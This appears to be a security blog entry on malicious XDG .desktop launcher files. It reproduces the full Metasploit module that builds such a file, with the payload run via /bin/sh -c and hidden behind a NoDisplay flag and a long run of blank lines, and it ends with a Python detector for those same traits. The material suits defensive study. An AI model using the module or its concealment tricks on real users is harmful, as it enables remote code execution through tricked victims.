Malicious XDG Desktop File

Vulnerability information

Vulnerability name: Malicious XDG Desktop File

Vulnerability type: File upload

Severity: High

Vulnerability description: This vulnerability concerns the malicious use of XDG desktop files (.desktop files). The XDG desktop file is a standard file format used on Linux, Unix, Solaris and FreeBSD to define application launchers. These files are typically used in graphical user interfaces so that users can launch applications conveniently. However, because these files can contain instructions that execute commands, a maliciously crafted .desktop file can be used to run unauthorized commands.

The technical root cause is that the execution directive of a .desktop file (the Exec field) can be crafted to run arbitrary commands. Although most modern systems do not trust .desktop files by default and show the user a warning prompt at run time, the user may still choose to run the file. In addition, the default file manager in some desktop environments may impose stricter execution requirements, such as prompting the user to mark the file as executable or as trusted before it can be executed.

The security risk is high because it can lead to remote code execution. An attacker can exploit it by tricking a user into opening a maliciously crafted .desktop file. Because the attack requires user interaction, it is generally regarded as a social-engineering attack. Once a user has been tricked into executing the malicious file, however, the attacker can run arbitrary commands on the victim's system, potentially leading to data exfiltration, service disruption or other malicious activity. Exploitation requires no authentication, but it does require some form of user interaction.

Product name: XDG Desktop

Source: https://github.com/rapid7/metasploit-framework/blob/28799d90abe13afcf4e5cdeb466c545bb0ceb9c5/modules%2Fexploits%2Fmulti%2Ffileformat%2Fxdg_desktop.rb

Type: rapid7/metasploit-framework:github issues

PoC details


##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Malicious XDG Desktop File',
        'Description' => %q{
          This module creates a malicious XDG Desktop (.desktop) file.

          On most modern systems, desktop files are not trusted by default.
          The user will receive a warning prompt that the file is not trusted
          when running the file, but may choose to run the file anyway.

          The default file manager applications in some desktop environments
          may impose more strict execution requirements by prompting the user
          to set the file as executable and/or marking the file as trusted
          before the file can be executed.
        },
        'Author' => [
          'bcoles'
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['ATT&CK', Mitre::Attack::Technique::T1204_002_MALICIOUS_FILE],
          ['URL', 'https://specifications.freedesktop.org/desktop-entry-spec/latest/'],
          ['URL', 'https://specifications.freedesktop.org/desktop-entry-spec/latest/exec-variables.html'],
          ['URL', 'https://wiki.archlinux.org/title/Desktop_entries']
        ],
        'Platform' => %w[linux unix solaris freebsd],
        'Arch' => [ARCH_CMD],
        'Targets' => [
          [ 'Automatic', {} ]
        ],
        'DefaultTarget' => 0,
        'Privileged' => false,
        'DisclosureDate' => '2007-02-06',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [SCREEN_EFFECTS]
        }
      )
    )

    register_options([
      OptString.new('FILENAME', [false, 'The desktop file name.', 'msf.desktop']),
      OptString.new('APPLICATION_NAME', [false, 'The application name. Some file managers will display this name instead of the file name. (default is random)', '']),
    ])

    register_advanced_options([
      OptInt.new('PrependNewLines', [false, 'Prepend new lines before the payload.', 100]),
    ])
  end

  def application_name
    datastore['APPLICATION_NAME'].blank? ? rand_text_alpha(6..12) : datastore['APPLICATION_NAME']
  end

  def exploit
    values = [
      'Type=Application',
      "Name=#{application_name}",
      # 'Hidden=true', # This property is not supported by old systems, which prevents execution
      'NoDisplay=true',
      'Terminal=false'
    ]
    desktop = "[Desktop Entry]\n"
    desktop << values.shuffle.join("\n")
    desktop << "\n"
    desktop << "\n" * datastore['PrependNewLines']

    escaped_payload = payload.encoded.gsub('\\', '\\\\\\').gsub('"', '\\"')
    desktop << "Exec=/bin/sh -c \"#{escaped_payload}\""

    file_create(desktop)
  end
end
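The module above builds a launcher whose Exec= line wraps the payload in /bin/sh -c, hides it from application menus with NoDisplay=true, and pushes it below a run of blank lines (PrependNewLines). The following is an added detection example, not part of the Metasploit module or the original page: it parses the [Desktop Entry] group the way the spec reads it (blank lines and comments skipped) and flags those three traits. The sample files, the shell name list and the padding threshold of 10 are constructed assumptions.

```python
# Constructed samples (not real files): MALICIOUS mirrors the layout the module
# above emits (shuffled keys, NoDisplay=true, a run of blank lines, then an
# Exec= line wrapping a command in /bin/sh -c); BENIGN is an ordinary launcher.
MALICIOUS = (
    "[Desktop Entry]\nNoDisplay=true\nTerminal=false\nName=Invoice\nType=Application\n"
    + "\n" * 40
    + 'Exec=/bin/sh -c "echo hello"\n'
)
BENIGN = "[Desktop Entry]\nType=Application\nName=Editor\nExec=gedit %U\n"

SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}  # assumed list of shell binaries to flag
PADDING_THRESHOLD = 10  # assumed cutoff; the module defaults to 100 blank lines

def parse_desktop_entry(text):
    """Return (entries, longest_blank_run) for the [Desktop Entry] group.
    Blank lines and comments are ignored per the spec, so Exec= still works
    behind any amount of padding; the longest blank run is what hides it."""
    entries, in_group, run, longest = {}, False, 0, 0
    for line in text.splitlines():
        if not line.strip():
            run += 1
            longest = max(longest, run)
            continue
        run = 0
        if line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = line.strip() == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, _, value = line.partition("=")
            entries[key.strip()] = value.strip()
    return entries, longest

def assess(text):
    """Return a list of finding tags for one .desktop file's contents."""
    entries, longest = parse_desktop_entry(text)
    findings = []
    exec_value = entries.get("Exec", "")
    argv0 = exec_value.split()[0].rsplit("/", 1)[-1] if exec_value else ""
    if argv0 in SHELLS and " -c " in exec_value:
        findings.append("exec-shell-c")        # command passed to a shell as a -c string
    if entries.get("NoDisplay", "").lower() == "true" and exec_value:
        findings.append("hidden-launcher")     # runs but is hidden from application menus
    if longest >= PADDING_THRESHOLD:
        findings.append("blank-line-padding")  # Exec= pushed below a wall of blank lines
    return findings
```

Feeding MALICIOUS to assess() yields all three tags, while BENIGN yields none; the same checks apply to any .desktop file found in Downloads or ~/.local/share/applications.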

http://example.com/2025/08/04/github_4213097649/
Author: lianccc
Published: 4 August 2025